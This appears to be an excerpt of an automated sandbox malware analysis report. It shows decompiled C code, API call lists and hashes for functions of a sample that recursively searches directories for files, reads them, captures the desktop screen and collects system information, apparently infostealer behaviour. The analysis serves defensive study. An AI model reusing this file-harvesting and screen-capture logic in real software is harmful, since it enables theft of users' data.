Opcode Fuzzy Hash: d18511dcb49cecff3af7a8a3a4a2ac7ba367992507ce9e77723320c17dcaae13
Instruction Fuzzy Hash: 4BA1B471A00215AFDB14DBA6DD89FAF77B5EB48310F004429F615BB2D0DBB89D10CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403C8F Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 255
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E00403C8F(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a12) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				struct _WIN32_FIND_DATAW _v640;
				void* _t60;
				void* _t62;
				void* _t63;
				void* _t66;
				void* _t70;
				signed int _t77;
				signed int _t86;
				signed int _t91;
				void* _t93;
				void* _t94;
				void* _t96;
				WCHAR* _t97;
				void* _t98;
				int _t101;
				signed int _t103;
				void* _t105;
				void* _t107;
				void* _t109;
				void* _t111;
				signed int _t123;
				void* _t124;
				void* _t125;
				void* _t127;
				signed int _t160;
				intOrPtr _t173;
				void* _t181;
				void* _t186;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;

				_v36 = __edx;
				_v28 = __ecx;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e1a8);
				while(1) {
					_t124 = _t60;
					if(_t124 == 0) {
						break;
					}
					_t125 = _t124 + 8;
					_t62 =  *((intOrPtr*)( *0x40e18c))(_t125,  *0x40e1f0);
					_t3 = _t62 + 2; // 0x2
					_t63 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
					_v24 = _t63;
					_t66 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t64); // executed
					_v12 = _t66;
					_t70 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t68);
					_v16 = _t70;
					_t186 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t71);
					_v20 = _t186;
					_v32 = _v24 - _t125 >> 1;
					_t77 = E0040A3E4(_t125,  &_v12, _t3 - _t125 >> 1, _v24 - _t125 >> 1);
					__eflags = _t77;
					if(_t77 == 0) {
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_t186);
						L16:
						L17:
						return 1;
					}
					_t181 =  *((intOrPtr*)( *0x40e18c))(_v24 + 2,  *0x40e1e8);
					_t189 = _t181 - _t125 >> 1;
					_t86 = E0040A3E4(_t125,  &_v16, _v32 + 1, _t189);
					__eflags = _t86;
					if(_t86 == 0) {
						L14:
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						goto L16;
					}
					_t17 = _t181 + 2; // 0x2
					_v48 =  *((intOrPtr*)( *0x40e18c))(_t17,  *0x40e228);
					_t20 = _t189 + 1; // 0x1
					_t91 = E0040A3E4(_t125,  &_v20, _t20, _t90 - _t125 >> 1);
					__eflags = _t91;
					if(_t91 == 0) {
						goto L14;
					}
					_t93 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_t94 =  *((intOrPtr*)( *0x40e000))(_t93, _a12, _v20);
					_v24 = _t94;
					_t96 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _t94);
					_t173 =  *0x40e1d0; // 0x4e5de0
					_t97 = E0040A503(_t96, _t173);
					_v44 = _t97;
					_t98 = FindFirstFileW(_t97,  &_v640); // executed
					_t127 = _t98;
					_v40 = _t127;
					__eflags = _t127 - 0xffffffff;
					if(_t127 == 0xffffffff) {
						return 0;
					} else {
						goto L5;
					}
					do {
						L5:
						__eflags = _v640.dwFileAttributes & 0x00000010;
						if((_v640.dwFileAttributes & 0x00000010) != 0) {
							__eflags = _v640.cFileName - 0x2e;
							if(_v640.cFileName != 0x2e) {
								_t103 =  *((intOrPtr*)( *0x40e18c))( &(_v640.cFileName), _v12);
								__eflags = _t103;
								if(_t103 != 0) {
									_t105 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_t191 =  *((intOrPtr*)( *0x40e13c))(_t105, _a12);
									_v32 = _t191;
									_t107 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
									_t35 = _t107 + 2; // 0x2
									_t160 = _t35 - _t191;
									__eflags = _t160;
									 *((short*)(_t191 + (_t160 >> 1) * 2 - 0x16)) = 0;
									_t109 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
									_t39 = _t109 + 2; // 0x2
									 *((intOrPtr*)( *0x40e044))(0x40, 0x208);
									_t192 = _v24;
									_t111 = E0040A503(0, _t192);
									_t193 =  *((intOrPtr*)( *0x40e000))(_t111, _t192,  &(_v640.cFileName));
									E004039D7(_t193, _v16, __eflags, _t39, _t35, _v36, _a4);
									_t194 = _t194 + 0x10;
									LocalFree(_t193);
									LocalFree(_v32);
									_t127 = _v40;
								}
							}
						}
						_t101 = FindNextFileW(_t127,  &_v640); // executed
						__eflags = _t101;
					} while (_t101 != 0);
					FindClose(_t127); // executed
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					LocalFree(_v44);
					_t123 = _v48 + 2;
					__eflags = _t123;
					_t60 =  *((intOrPtr*)( *0x40e18c))(_t123,  *0x40e1a8);
				}
				goto L17;
			}

0x00403ca6
0x00403caa
0x00403cad
0x00403f55
0x00403f55
0x00403f59
0x00000000
0x00000000
0x00403cbf
0x00403cc3
0x00403cd1
0x00403cd5
0x00403ce6
0x00403cf0
0x00403cfb
0x00403d0a
0x00403d1b
0x00403d27
0x00403d3b
0x00403d3e
0x00403d41
0x00403d48
0x00403d4a
0x00403f7f
0x00403f88
0x00403f8f
0x00403f8f
0x00403f95
0x00000000
0x00403f97
0x00403d6b
0x00403d71
0x00403d78
0x00403d7f
0x00403d81
0x00403f65
0x00403f68
0x00403f71
0x00403f8f
0x00000000
0x00403f8f
0x00403d93
0x00403d9b
0x00403da6
0x00403dac
0x00403db3
0x00403db5
0x00000000
0x00000000
0x00403dc8
0x00403dd7
0x00403de4
0x00403ded
0x00403df2
0x00403dfa
0x00403e0d
0x00403e10
0x00403e12
0x00403e14
0x00403e17
0x00403e1a
0x00000000
0x00000000
0x00000000
0x00000000
0x00403e20
0x00403e20
0x00403e20
0x00403e27
0x00403e2d
0x00403e35
0x00403e4a
0x00403e4c
0x00403e4e
0x00403e60
0x00403e74
0x00403e7b
0x00403e7e
0x00403e82
0x00403e89
0x00403e89
0x00403e8f
0x00403e9a
0x00403ea9
0x00403eac
0x00403eae
0x00403eb5
0x00403ed1
0x00403eda
0x00403edf
0x00403ee3
0x00403eec
0x00403ef2
0x00403ef2
0x00403e4e
0x00403e35
0x00403f02
0x00403f04
0x00403f04
0x00403f0d
0x00403f16
0x00403f1f
0x00403f28
0x00403f31
0x00403f3a
0x00403f4f
0x00403f4f
0x00403f53
0x00403f53
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 00403CF0
LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D0A
LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D25

Strings

]N, xrefs: 00403DF2

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: ]N
API String ID: 3494564517-2051070738
Opcode ID: 1bb4ae642edddd975e73f152ff3b11f606833d84a600c2f2473e6c48155b5260
Instruction ID: 30a2a756aa81b8726d571d7f3e9c3124e2b02b732ad4ca54e9afcb5ed5404845
Opcode Fuzzy Hash: 1bb4ae642edddd975e73f152ff3b11f606833d84a600c2f2473e6c48155b5260
Instruction Fuzzy Hash: CC91B571A00215AFDF089FA5DD49DAE7BB9EB48310F004839F905B73A0DB746D21CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADD Relevance: 30.4, APIs: 20, Instructions: 387filewindowlibraryCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00408B01
LoadLibraryW.KERNEL32 ref: 00408B16
GetClientRect.USER32(?,?), ref: 00408C7F
SetStretchBltMode.GDI32(?,00000004), ref: 00408C88
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00CC0020), ref: 00408CC5
SelectObject.GDI32(?,00000000), ref: 00408CFA
GetObjectW.GDI32(00000000,00000018,?), ref: 00408D37

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000004,00000000,00000000), ref: 00408D9E

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000), ref: 00408E46
CloseHandle.KERNEL32(?), ref: 00408E51
DeleteFileW.KERNEL32(?), ref: 00408E58
LocalFree.KERNEL32(?), ref: 00408E5F
LocalFree.KERNEL32(?), ref: 00408E69
LocalFree.KERNEL32(00000000), ref: 00408F41
LocalFree.KERNEL32(?), ref: 00408F4B
LocalFree.KERNEL32(?), ref: 00408F55
LocalFree.KERNEL32(?), ref: 00408F5C
LocalFree.KERNEL32(?), ref: 00408F66
DeleteObject.GDI32(00000000), ref: 00408F6D
DeleteObject.GDI32(?), ref: 00408F77

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$Object$Delete$FileStretchlstrlen$AllocClientCloseCreateDesktopGlobalHandleLibraryLoadModeRectSelectWindow
String ID:
API String ID: 2597395389-0
Opcode ID: deff7585ebf4a3cada0b4e5203a5cf84e0c26f1f4b35f6455ec07dc6f0e53994
Instruction ID: 01ed2ab5b407dfc10e46f60f726f8b4f8e8024e8c2023dc9817dc03e66c0134a
Opcode Fuzzy Hash: deff7585ebf4a3cada0b4e5203a5cf84e0c26f1f4b35f6455ec07dc6f0e53994
Instruction Fuzzy Hash: 53D12E71104211AFE705DFA6DE44E2B7BF9EB89710F004D3DFA54E72A0DB7499208B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004052DA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232
fileCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E004052DA(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v568;
				struct _WIN32_FIND_DATAW _v616;
				intOrPtr _v628;
				void* _v632;
				void* _v640;
				intOrPtr _v664;
				char _v668;
				intOrPtr _v688;
				void* _v696;
				intOrPtr _v700;
				void* _v704;
				void* _v712;
				void* _v716;
				void* _v720;
				char _v736;
				intOrPtr _v748;
				intOrPtr _v760;
				void* _v768;
				intOrPtr _v776;
				signed int _v784;
				void* _v788;
				void* _v792;
				void* _v796;
				intOrPtr _v800;
				void* _v804;
				void* _v820;
				void* _v828;
				void* __ebx;
				void* __esi;
				void* _t62;
				void* _t66;
				void* _t68;
				char _t69;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int _t74;
				void* _t76;
				void* _t86;
				void* _t112;
				void* _t113;
				void* _t114;
				intOrPtr _t151;
				void* _t153;
				void* _t154;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t163;
				void* _t164;
				signed int _t166;
				void* _t168;

				_t168 = (_t166 & 0xfffffff8) - 0x284;
				_v628 = __edx;
				_t160 = __ecx;
				_t62 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t153, _t159, _t112);
				_t113 =  *((intOrPtr*)( *0x40e13c))(_t62, __ecx);
				_v632 = _t113;
				E0040188C(_t113, _t113, 0x104, __ecx,  *0x40e1d0);
				_t66 = FindFirstFileW(_t113,  &_v616); // executed
				_t154 = _t66;
				_v640 = _t154;
				if(_t154 != 0xffffffff) {
					_t114 = _t160;
					do {
						if((_v616.ftCreationTime & 0x00000010) == 0) {
							_t68 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t69 =  *((intOrPtr*)( *0x40e000))(_t68, _t114,  &(_v616.dwReserved1));
							_v668 = _t69;
							_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t72 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8), _a4);
							_v700 = _t72;
							_t73 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_v700 = _t73;
							_t74 =  *((intOrPtr*)( *0x40e08c))(0);
							_t161 = _v696;
							if(E0040A2AA(_t161 + _t74 * 2,  &_v704, _v688) != 0) {
								_t76 = E0040A503(_v712, _v704);
								_v712 = _t76;
								_v716 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
								if(E0040A69E( *0x40e044,  &_v716) != 0) {
									_t164 = _v716;
									_push(0);
									_push(_t164);
									_push(_v704);
									if( *((intOrPtr*)( *0x40e184))() != 0) {
										_v748 =  *((intOrPtr*)( *0x40e03c))(_t164, 0x80000000, 1, 0, 4, 0, 0);
										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v760, 0xffffffff, 0, 0, 0, 0);
										_v768 = 0;
										 *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
										_t151 = _v776;
										_v796 = 0;
										if(_t151 != 0) {
											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v800, 0xffffffff, 0, _t151, 0, 0);
											if(0 == 0 || E0040A70E( &_v736, _a8) == 0) {
												LocalFree(_v828);
												CloseHandle(_v820);
												DeleteFileW(_t164);
												LocalFree(_t164);
											} else {
												_t139 = _a20;
												_v784 = _v784 & 0x00000000;
												_v796 = _v828;
												_v792 = _v820;
												_v788 = _t164;
												 *_t139 =  *_a20 + 1;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t154 = _v804;
											}
										}
									}
								}
								LocalFree(_v704);
							} else {
								LocalFree(_t161);
							}
							LocalFree(_v720);
							LocalFree(_v712);
							L18:
							goto L19;
						}
						if(_v568 != 0x2e && E0040A70E( &_v568, _a12) == 0) {
							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t163 =  *((intOrPtr*)( *0x40e000))(_t86, _t114,  &(_v616.dwReserved1));
							E004052DA(_t163, _v664, _a4, _a8, _a12, _a16, _a20);
							_t168 = _t168 + 0x14;
							LocalFree(_t163);
							goto L18;
						}
						L19:
						_push( &_v668);
						_push(_t154);
					} while ( *((intOrPtr*)( *0x40e148))() != 0);
					LocalFree(_v696);
					FindClose(_t154);
					goto L21;
				} else {
					LocalFree(_t113);
					L21:
					return 0;
				}
			}

0x004052e0
0x004052f5
0x004052f9
0x004052fb
0x0040530d
0x00405316
0x0040531a
0x0040532b
0x0040532d
0x0040532f
0x00405336
0x00405344
0x00405346
0x0040534b
0x004053bb
0x004053ca
0x004053d9
0x004053dd
0x004053f3
0x00405405
0x00405409
0x00405417
0x0040541b
0x0040541d
0x00405430
0x00405440
0x00405452
0x0040545c
0x00405467
0x0040546d
0x00405476
0x00405478
0x00405479
0x00405481
0x004054a3
0x004054b9
0x004054c8
0x004054cc
0x004054ce
0x004054d2
0x004054d8
0x004054f7
0x004054fb
0x00405549
0x00405554
0x0040555b
0x00405562
0x0040550d
0x0040550d
0x00405514
0x00405519
0x00405521
0x00405530
0x00405538
0x0040553a
0x0040553b
0x0040553c
0x0040553d
0x0040553e
0x0040553e
0x004054fb
0x004054d8
0x00405481
0x0040556c
0x00405432
0x0040556c
0x0040556c
0x00405576
0x00405580
0x00405580
0x00000000
0x00405580
0x00405353
0x00405379
0x00405391
0x004053a1
0x004053a6
0x00405580
0x00000000
0x00405580
0x00405586
0x0040558f
0x00405590
0x00405593
0x004055a0
0x004055a7
0x00000000
0x00405338
0x00405339
0x004055ad
0x004055b5
0x004055b5

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0040532B
LocalFree.KERNEL32(00000000), ref: 00405339
LocalFree.KERNEL32(?), ref: 00405580
LocalFree.KERNEL32(?), ref: 004055A0
FindClose.KERNEL32(00000000), ref: 004055A7

Strings

., xrefs: 0040534D

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$Find$CloseFileFirst
String ID: .
API String ID: 422121646-248832578
Opcode ID: 8c6a5511dc8fc088a2e42269fb89b557bfc65514d3feaa707af3d02d29105364
Instruction ID: 9add6ecd6c2ae3d530fb5184dfeb79ca83270308c151c7c4913ae962937730f4
Opcode Fuzzy Hash: 8c6a5511dc8fc088a2e42269fb89b557bfc65514d3feaa707af3d02d29105364
Instruction Fuzzy Hash: 9C816CB1604301AFDB04DF61DD45E2B77A5EB88714F004D2DFA55A72E0DBB4E910CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401B05 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124
fileCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00401B05(WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				intOrPtr _v12;
				struct _WIN32_FIND_DATAW _v608;
				char _v1126;
				short _v1128;
				void* __ebx;
				void* __esi;
				void* _t32;
				int _t33;
				void* _t39;
				signed int _t41;
				void* _t60;
				WCHAR* _t80;
				void* _t81;
				WCHAR* _t83;
				void* _t84;

				_v12 = __edx;
				_t80 = __ecx;
				if(_a12 > 2) {
					L14:
					return 1;
				}
				_push(__ecx);
				E004018E9( &_v1128, 0x104, __ecx, __ecx);
				E0040188C(0x104,  &_v1128, 0x104, _t81,  *0x40e1d0);
				_t32 = FindFirstFileW( &_v1128,  &_v608); // executed
				_t60 = _t32;
				if(_t60 != 0xffffffff) {
					goto L3;
				} else {
					return 0;
				}
				do {
					L3:
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					_push( *0x40e1dc);
					_push( &(_v608.cFileName));
					if( *((intOrPtr*)( *0x40e0a0))() != 0) {
						_push( *0x40e1ac);
						_push( &(_v608.cFileName));
						if(lstrlenW( *((intOrPtr*)( *0x40e18c))()) <= 0) {
							_t39 = 0x2e;
							if(_t39 != _v608.cFileName) {
								_t41 =  *((intOrPtr*)( *0x40e08c))(_t80);
								_t70 =  &_v1126 + _t41 * 2;
								_push( &_v1126 + _t41 * 2);
								E004018E9( &_v1126 + _t41 * 2, 0x104, _t70,  &(_v608.cFileName));
								_t25 =  &_a8; // 0x407b38
								E00401B05( &_v1128, _v12, _a4,  *_t25, _a12 + 1); // executed
								_t84 = _t84 + 0xc;
							}
							goto L12;
						}
						_t83 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
						PathCombineW(_t83, _t80,  &(_v608.cFileName));
						_push(1);
						L8:
						_t14 =  &_a8; // 0x407b38
						_push( *_t14);
						_push(_a4);
						E00401E18(_t83, _v12); // executed
						_t84 = _t84 + 0xc;
						if(_t83 != 0) {
							LocalFree(_t83);
						}
						goto L12;
					}
					_t83 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					PathCombineW(_t83, _t80,  &(_v608.cFileName));
					_push(0);
					goto L8;
					L12:
					_t33 = FindNextFileW(_t60,  &_v608); // executed
				} while (_t33 != 0);
				FindClose(_t60); // executed
				goto L14;
			}

0x00401b15
0x00401b18
0x00401b1a
0x00401c80
0x00000000
0x00401c80
0x00401b20
0x00401b30
0x00401b43
0x00401b5b
0x00401b5d
0x00401b62
0x00000000
0x00401b64
0x00000000
0x00401b64
0x00401b6b
0x00401b6b
0x00401b72
0x00000000
0x00000000
0x00401b78
0x00401b89
0x00401b8e
0x00401bb3
0x00401bca
0x00401bd2
0x00401c17
0x00401c1f
0x00401c27
0x00401c34
0x00401c37
0x00401c40
0x00401c53
0x00401c59
0x00401c5e
0x00401c5e
0x00000000
0x00401c1f
0x00401be2
0x00401bed
0x00401bf3
0x00401bf5
0x00401bf5
0x00401bf5
0x00401bfd
0x00401c00
0x00401c05
0x00401c0a
0x00401c0d
0x00401c0d
0x00000000
0x00401c0a
0x00401b9e
0x00401ba9
0x00401baf
0x00000000
0x00401c61
0x00401c6f
0x00401c71
0x00401c7a
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401B5B
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401BA9
LocalFree.KERNEL32(00000000), ref: 00401C0D
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00401C6F
FindClose.KERNEL32(00000000), ref: 00401C7A

Strings

]N, xrefs: 00401B35
8{@, xrefs: 00401C53, 00401BF5

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Find$File$CloseCombineFirstFreeLocalNextPath
String ID: 8{@$]N
API String ID: 3818457336-3868124660
Opcode ID: 0d563a21696d45e51e4e742b712c43a06de6a103015c0db40193237efc02fdb8
Instruction ID: e4eb25170f48de3e52739dcc6529c8d0564bd3351774df583b1370a22c53c5e7
Opcode Fuzzy Hash: 0d563a21696d45e51e4e742b712c43a06de6a103015c0db40193237efc02fdb8
Instruction Fuzzy Hash: 6741E871900214ABDB149B61DEC8FAA7778EB85300F004579F905B72A0EB79DE55CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040196E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 130
fileCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E0040196E(WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v12;
				struct _WIN32_FIND_DATAW _v608;
				char _v1126;
				short _v1128;
				void* __ebx;
				void* __esi;
				void* _t33;
				int _t34;
				void* _t39;
				signed int _t41;
				void* _t62;
				WCHAR* _t83;
				intOrPtr _t84;
				WCHAR* _t85;
				void* _t86;

				_t84 = __edx;
				_v12 = __edx;
				_t83 = __ecx;
				if(_a12 > 2) {
					L11:
					return 1;
				}
				_push(__ecx);
				E004018E9( &_v1128, 0x104, __ecx, __ecx);
				E0040188C(0x104,  &_v1128, 0x104, __edx,  *0x40e1d0);
				_t33 = FindFirstFileW( &_v1128,  &_v608); // executed
				_t62 = _t33;
				if(_t62 != 0xffffffff) {
					do {
						if((_v608.dwFileAttributes & 0x00000010) == 0) {
							goto L9;
						}
						_push( *0x40e1dc);
						_push( &(_v608.cFileName));
						if( *((intOrPtr*)( *0x40e0a0))() != 0) {
							_push( *0x40e1ac);
							_push( &(_v608.cFileName));
							if( *((intOrPtr*)( *0x40e18c))() == 0) {
								L16:
								_t39 = 0x2e;
								if(_t39 != _v608.cFileName) {
									_t41 =  *((intOrPtr*)( *0x40e08c))(_t83);
									_t72 =  &_v1126 + _t41 * 2;
									_push( &_v1126 + _t41 * 2);
									E004018E9( &_v1126 + _t41 * 2, 0x104, _t72,  &(_v608.cFileName));
									E0040196E( &_v1128, _t84, _a4, _a8, _a12 + 1); // executed
									_t86 = _t86 + 0xc;
								}
								goto L9;
							}
							_push( *0x40e1cc);
							_push( &(_v608.cFileName));
							if( *((intOrPtr*)( *0x40e18c))() == 0) {
								goto L16;
							}
							_t85 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							PathCombineW(_t85, _t83,  &(_v608.cFileName));
							_push(1);
							L6:
							_push(_a8);
							_push(_a4);
							E00401E18(_t85, _v12);
							_t86 = _t86 + 0xc;
							if(_t85 != 0) {
								LocalFree(_t85);
							}
							_t84 = _v12;
							goto L9;
						}
						_t85 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
						PathCombineW(_t85, _t83,  &(_v608.cFileName));
						_push(0);
						goto L6;
						L9:
						_t34 = FindNextFileW(_t62,  &_v608); // executed
					} while (_t34 != 0);
					FindClose(_t62); // executed
					goto L11;
				}
				return 0;
			}

0x0040197d
0x00401980
0x00401983
0x00401985
0x00401a54
0x00000000
0x00401a54
0x0040198b
0x0040199b
0x004019ae
0x004019c6
0x004019c8
0x004019cd
0x004019d6
0x004019dd
0x00000000
0x00000000
0x004019df
0x004019f0
0x004019f5
0x00401a5b
0x00401a6c
0x00401a71
0x00401ab1
0x00401ab3
0x00401abb
0x00401ac7
0x00401ad4
0x00401ad7
0x00401ae0
0x00401af8
0x00401afd
0x00401afd
0x00000000
0x00401abb
0x00401a73
0x00401a84
0x00401a89
0x00000000
0x00000000
0x00401a99
0x00401aa4
0x00401aaa
0x00401a18
0x00401a18
0x00401a20
0x00401a23
0x00401a28
0x00401a2d
0x00401a30
0x00401a30
0x00401a36
0x00000000
0x00401a36
0x00401a05
0x00401a10
0x00401a16
0x00000000
0x00401a39
0x00401a47
0x00401a49
0x00401a4e
0x00000000
0x00401a4e
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004019C6
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401A10
LocalFree.KERNEL32(00000000), ref: 00401A30
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00401A47
FindClose.KERNEL32(00000000), ref: 00401A4E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401AA4

Strings

]N, xrefs: 004019A0
XO, xrefs: 00401A73

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Find$CombineFilePath$CloseFirstFreeLocalNext
String ID: XO$]N
API String ID: 1203334675-656505332
Opcode ID: 6a9ca44490c9a4a8961f3d1a0bee996609b7599d894a2e19d50e07a58da0faa2
Instruction ID: 3d68e71345cd2aefdee3dd56593ad5adbe6c8fe38e95c290ac396d302c259ee2
Opcode Fuzzy Hash: 6a9ca44490c9a4a8961f3d1a0bee996609b7599d894a2e19d50e07a58da0faa2
Instruction Fuzzy Hash: D2410571600214ABDB24EB55DD84FAB7378EB44300F00457AF905B32E0EB789E55CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004092CF Relevance: 13.6, APIs: 9, Instructions: 131stringCOMMON

Download Yara Rule

APIs

lstrcpyn.KERNEL32(00000000,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040933B
lstrcpyn.KERNEL32(00000010,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040937B
lstrcpyn.KERNEL32(00000020,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 004093BB
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 004093C5

Part of subcall function 0040A4C2: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,76426c3f362f5a47a469f0e9d8bc3eef,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1

wsprintfW.USER32 ref: 004093E3

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 004093FB
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 00409402
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 00409411
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 0040941B

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

